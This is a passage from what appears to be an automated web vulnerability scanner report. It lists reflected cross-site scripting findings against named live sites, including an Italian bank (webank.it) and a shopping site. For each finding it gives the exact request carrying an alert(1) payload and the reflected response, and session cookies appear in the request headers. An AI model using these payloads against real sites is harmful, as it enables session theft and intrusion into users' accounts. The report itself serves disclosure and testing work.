Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=039231f0a2f9caf8d26c29987e32457b212a69bccb46787c4dbf4457; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304420113577:ss=1304420113574; targetappl=https://www.auth.eni.it/en_IT/reserved/home-shadow.page

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:58 GMT
Cache-Control: no-cache="set-cookie"
Content-Length: 2302
Set-Cookie: JSESSIONID=n2tvN1GNXBJBFw3ngm2vJxGmYyPBSlxx4Qgyv1l2VChYJqrnVLX3!-2020469318; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS782077=039231f0a2f9caf8d26c29987e32457b212a69bccb46787c4dbf4457; Path=/


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<link rel="stylesheet" href="/it_ITc2c81"><script>alert(1)</script>05d12a7095a/static/css/mobile/mobile.css" media="screen" />
...[SNIP]...

4.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5c7"><script>alert(1)</script>626d1de0ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140&4b5c7"><script>alert(1)</script>626d1de0ab=1 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:37:49 GMT
Set-Cookie: JSESSIONID=01EC0E3AE923672F051417E1FEAC132D; Path=/
Set-Cookie: ATG_SESSION_ID=01EC0E3AE923672F051417E1FEAC132D; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<input name="4b5c7"><script>alert(1)</script>626d1de0ab" type="hidden" value="1"/>
...[SNIP]...

4.41. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7248'><script>alert(1)</script>243af41db24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140&b7248'><script>alert(1)</script>243af41db24=1 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:37:55 GMT
Set-Cookie: JSESSIONID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/
Set-Cookie: ATG_SESSION_ID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Category.jsp?CATID=SH246140&b7248'><script>alert(1)</script>243af41db24=1&login=failed'>
...[SNIP]...

4.42. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Product.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87779'><script>alert(1)</script>162b4a1d039 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sh4/catalog/Product.jsp?PRODID=SH246237857&87779'><script>alert(1)</script>162b4a1d039=1 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH245868
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedwww.shopping24.ilsole24ore.comwww.shopping24.ilsole24ore.com; s_lastvisit=1304398129881; SC_LINKS_NW=%5B%5BB%5D%5D; SC_LINKS_VG=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304398796.2.2.utmcsr=luxury24.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304398796.2; __utmc=30117245; __utmb=30117245.1.10.1304398796; c=undefinedwww.luxury24.ilsole24ore.comwww.luxury24.ilsole24ore.com; s_nr=1304399018901-New; SC_LINKS_SH=S24%3Aprodotti%3ASoftware%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3ASoftware%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253ASoftware%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp%25253FPRODID%25253DSH246237857%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:13:25 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 34251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Small Office 24
...[SNIP]...
<input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Product.jsp?PRODID=SH246237857&87779'><script>alert(1)</script>162b4a1d039=1&login=failed'>
...[SNIP]...

4.43. https://www.webank.it/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98eb'-alert(1)-'63578c43715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d98eb'-alert(1)-'63578c43715=1 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 32022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_home_nw';
       var obsKey = 'nav_pub_wb_home_nw?d98eb'-alert(1)-'63578c43715=1';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'lqgd7CdsPrF
...[SNIP]...

4.44. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the OBS_KEY request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 was submitted in the OBS_KEY parameter. This input was echoed as 3bdfb'style='x:expression(alert(1))'6c2bb6a8eb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000Vnqrp8rtzmOcaG9dXeDNWI_:15lb9kih8; Path=/
Set-Cookie: WsId=130438135429616680041160.765299070693942518956; Expires=Wed, 02 May 2012 00:09:14 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<input type="hidden" name="OBS_KEY" value='pro_wbn_apri_conto_webank3bdfb'style='x:expression(alert(1))'6c2bb6a8eb3' />
...[SNIP]...

4.45. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 572f4'-alert(1)-'a0f1e2f6476 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000zhp2RTV0-c6NSgI4EzNXEuj:15lb9kke0; Path=/
Set-Cookie: WsId=130438135888416680041160.353987200196531318959; Expires=Wed, 02 May 2012 00:09:18 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_conti_nw';
       var obsKey = 'pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'lwHtAMSw9BODj
...[SNIP]...

4.46. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [tabId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5264c'-alert(1)-'a24ae3b893b was submitted in the tabId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:08:56 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000-MpOZoETc6uopj89024ntQ2:15lb9keb5; Path=/
Set-Cookie: WsId=130438133643816680041160.1139854713653800618957; Expires=Wed, 02 May 2012 00:08:55 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b';
       var obsKey = 'pro_wbn_apri_conto_webank';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

...[SNIP]...

4.47. https://www.webank.it/webankpub/wb/fpServizi.do [OBS_KEY parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/fpServizi.do

Issue detail

The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bafc6'-alert(1)-'e07e81d0343 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/fpServizi.do?tabId=nav_pub_wb_serveaiuto_nw&OBS_KEY=pro_wbn_serve_aiutobafc6'-alert(1)-'e07e81d0343 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: https://www.webank.it/webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*; openedLogin=true; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:12:12 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 40794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_serveaiuto_nw';
       var obsKey = 'pro_wbn_serve_aiutobafc6'-alert(1)-'e07e81d0343';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'ONlKQrGjkXhRV
...[SNIP]...

4.48. https://www.webank.it/webankpub/wb/fpServizi.do [tabId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/fpServizi.do

Issue detail

The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d828'-alert(1)-'64857d4afb was submitted in the tabId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/fpServizi.do?tabId=nav_pub_wb_serveaiuto_nw8d828'-alert(1)-'64857d4afb&OBS_KEY=pro_wbn_serve_aiuto HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: https://www.webank.it/webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*; openedLogin=true; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:11:39 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 44599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_serveaiuto_nw8d828'-alert(1)-'64857d4afb';
       var obsKey = 'pro_wbn_serve_aiuto';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       va
...[SNIP]...

4.49. https://www.webank.it/webankpub/wb/home.do [OBS_KEY parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/home.do

Issue detail

The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a419d'-alert(1)-'ffb669067a9 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 32250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_home_nw';
       var obsKey = 'nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'MBbmJoDCIdKWw
...[SNIP]...

4.50. https://www.webank.it/webankpub/wb/home.do [tabId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/home.do

Issue detail

The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5f2'-alert(1)-'b008920cca9 was submitted in the tabId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9&OBS_KEY=nav_pub_wb_home_nw HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:58 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9';
       var obsKey = 'nav_pub_wb_home_nw';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var
...[SNIP]...

4.51. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e58f"><script>alert(1)</script>ec94702f118 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

